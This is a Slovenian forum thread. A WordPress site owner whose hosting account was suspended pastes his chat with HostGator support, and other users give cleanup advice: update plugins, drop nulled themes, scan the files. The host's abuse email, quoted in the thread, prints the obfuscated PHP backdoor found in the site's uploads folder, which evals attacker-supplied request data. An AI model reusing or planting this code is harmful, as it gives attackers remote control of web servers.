Zdravo,
Na hostgatorju imam virus. Vsaj tko so mi rekli na suportu.
Ko so mi zeleli podati edin program, ki to resi... Ker sem posumil in sel v raziskovanje sem naletel na to stran.http://www.hermesthemes.com/scam-alert-hostgator-sitelock-malware-extortion/
Njihova komunikacija je primerljiva cist z mojo oz med mano in njim.
Prosim za nasvet kako resiti zadevo. Saj na tak nacin ne zelim da kdo izsiljuje moj denar.
Prosim za klic ali nasvet. 041723824, v naprej hvala lepa.

evo spet z njimi..

check pleas
5:37:47 AM
Desmond H
Ok, one moment while I check on our backup for you.
5:38:30 AM
jaka
bout it moust be freee of malware!
5:40:09 AM
Desmond H
This is the backup we have for you: Full Backup: Mon Aug 8 05:21:28 CDT 2016
5:40:53 AM
jaka
bout when wos my page suspendet??
5:41:31 AM
Desmond H
Im not sure, I see it is not suspended now.
5:41:57 AM
jaka
realy??
5:42:20 AM
jaka
borilna-akademija.info/cgi-sys/suspendedpage.cgi
5:42:28 AM
jaka
???
5:42:29 AM
jaka
5:43:17 AM
Desmond H
Sorry, I found your ticket. It was started Aug 5th. So it looks like our backup has the malware on it too.
5:43:19 AM
Desmond H
HostGator’s automatic backup service runs once a week on a random day, and each run overwrites any previous backups. Only one week of backups are kept at a time. The terms of our backup policy vary depending on the type of hosting account. support.hostgator.com/articles/pre-sales-policies/rules-terms-of-service/backup-policy-do-you-provide-backups
5:44:03 AM
jaka
so what you sugest?
5:44:20 AM
jaka
what we can do?
5:44:42 AM
Desmond H
Due to recent changes we are no longer performing cleaning or scanning of accounts for our clients. This includes any malware removal or securing of accounts which have been compromised. We sincerely apologize for any inconvenience this may cause. If you are looking for a proactive approach to detecting and addressing security issues with your site, consider SiteLock, a site monitoring and protection tool for small and medium-sized businesses. Their service can also work to remove malicious content from your account. I would be happy to set it up so you get more information on this, or I can also have this ordered for you if you wish.

That is all I can offer you at this point. We use Sitelock for security, and only do once a week backups. Since the backup has malware, your only other options is to have your own backup or pay someone to remove the malware for you.

A ti povem kruto resnico?

Hosting providerji imajo/imamo počasi dovolj prevzemanja odgovornosti, za neodgovorne lastnike brez updatov in securanja. To je postal eden večjih stroškov v zadnjem času.

Sajt je tvoja odgovornost in ne od ponudnika. Tvoja odgovornost je, da zaščitiš in v primeru napada počistiš. Oni ti zgolj ponujajo orodje, ki bo ti pomagalo pri temu in ni to noben scam.

Predlagam, da najdeš nekoga, ki zna spucati stran. Na netu je kar nekaj providerjev za posamezne skripte in nato zadevo zaščitiš ter v prihodnosti redno nadgrajuješ. SiteLock je ena izmed opcij.

Priporočam SUCURI

Za prvo silo lahko greš čez file tudi s svojim windows antivirusnim programom. Malware je pogosto kje pod wp-content/images, ker je večja verjetnost da so direktoriji zapisljivi.

Ugibam da je bil kakšen plugin nameščen na strani ali pa template po piratski poti in je zaradi tega prišlo do malwera.

PS: thumbs up for fluid engrish

Počistit in zaščitit stran ni problem. Najti nekoga, ki ti bo to naredil za male pare, to je verjetno tvoj problem :).
Se pa pridružujem Žabcu. Spletna stran je predvsem odgovornost lastnika. Postavit WP ali Jombo zna že praktično vsak, ampak kaj ko je web development še vse kaj drugega kot klikanje next.

I am seeing that there is ticket for this. It shows in the email that was sent to you. Here is the content of the email:

Hello,

It has come to our attention that malware is hosted on an account under your control. We have disabled site access for your account to prevent further abuse.

xpsistem 105886 0.0 0.0 303876 17392 ? SN 03:40 0:00 | _ /opt/php54/bin/php-cgi /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

head -1 /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

<?php ... $n50="T|c7W;Qt&8iK6vMo0*g\$\n4\"Zb)VOlN(qGy?A~J-SxF_/n#D1}]P`{EwCU\r>3eB':jL.R%5s k,X2[\zY^f!H+r@h<\td9u=amIp";$GLOBALS['lkqja84'] = ${$n50[42].$n50[50].$n50[27].$n50[39].$n50[0]};$GLOBALS['aazcu53'] = $n50[87].$n50[60].$n50[94].$n50[90].$n50[60].$n50[85];if (!empty($GLOBALS['lkqja84']['m32c7e5f3'])) { eval($GLOBALS['lkqja84']['m32c7e5f3']); } $GLOBALS'aazcu53'; echo $n50[88].$n50[87].$n50[47].$n50[58].$n50[21].$n50[16].$n50[21].$n50[71].$n50[29].$n50[15].$n50[7].$n50[71].$n50[41].$n50[15].$n50[92].$n50[44].$n50[90].$n50[88].$n50[43].$n50[87].$n50[47].$n50[58].$n50[57].$n50[20].$n50[0].$n50[87].$n50[60].$n50[71].$n50[97].$n50[94].$n50[18].$n50[60].$n50[71].$n50[7].$n50[87].$n50[94].$n50[7].$n50[71].$n50[33].$n50[15].$n50[92].$n50[71].$n50[87].$n50[94].$n50[13].$n50[60].$n50[71].$n50[85].$n50[60].$n50[31].$n50[92].$n50[60].$n50[70].$n50[7].$n50[60].$n50[90].$n50[71].$n50[2].$n50[15].$n50[92].$n50[28].$n50[90].$n50[71].$n50[44].$n50[15].$n50[7].$n50[71].$n50[24].$n50[60].$n50[71].$n50[81].$n50[15].$n50[92].$n50[44].$n50[90].$n50[66].$n50[57].$n50[20];

stat /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

File: `/home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php';;
Size: 1449 Blocks: 8 IO Block: 4096 regular file
Device: 811h/2065d Inode: 58851329 Links: 1
Access: (0644/-rw-r--r--) Uid: (32286/xpsistem) Gid: (32288/xpsistem)
Access: 2016-07-24 17:00:16.000000000 -0500
Modify: 2016-07-24 17:00:16.000000000 -0500
Change: 2016-07-24 17:00:16.202371539 -0500

In order to remove the restrictions we’ve placed, you must resolve the security issue. Since we cannot perform this type of service for you, I recommend you contact SiteLock or another security service to prevent further damage to your server by the malicious content. We are partnered with SiteLock, so we can provide you with any assistance to sign up for their service.

Please note that repeated reports of malicious content on your account within 60 days of an initial notice will lead to further action being taken, including permanent suspension after failing to professionally clean the account.

Once you have taken steps to secure your account, please reply back to this ticket to request review.

Julian F.
Level II Linux Systems Administrator

kak nasvet?
Prosim.

Email pise o eni sami datoteki. Pobrisi jo in bos reaktiviran.

Potem pa bolj pomemben del:
- nadgradi core, vse teme in vse plugine na najnovejso verzijo - bodi pazljiv na placljive plugine (layerslider, visual composer, revolution slider, ...) ki so del placljivih tem in se sami od sebe ne posodabljajo - envato marketplace je divji zahod glede tega
- takoj umakni dol vse nulled pluge/teme, ce imas kaj
- dolpotegni datoteke in naredi scan z desktop antivirusom
- naredi temeljit web scan (sucuri in kup drugih)
- aktiviraj si enega izmed security paketov (sucuri, ithemes security, ...)

In potem se bolj pomemben del:
- redno posodabljaj!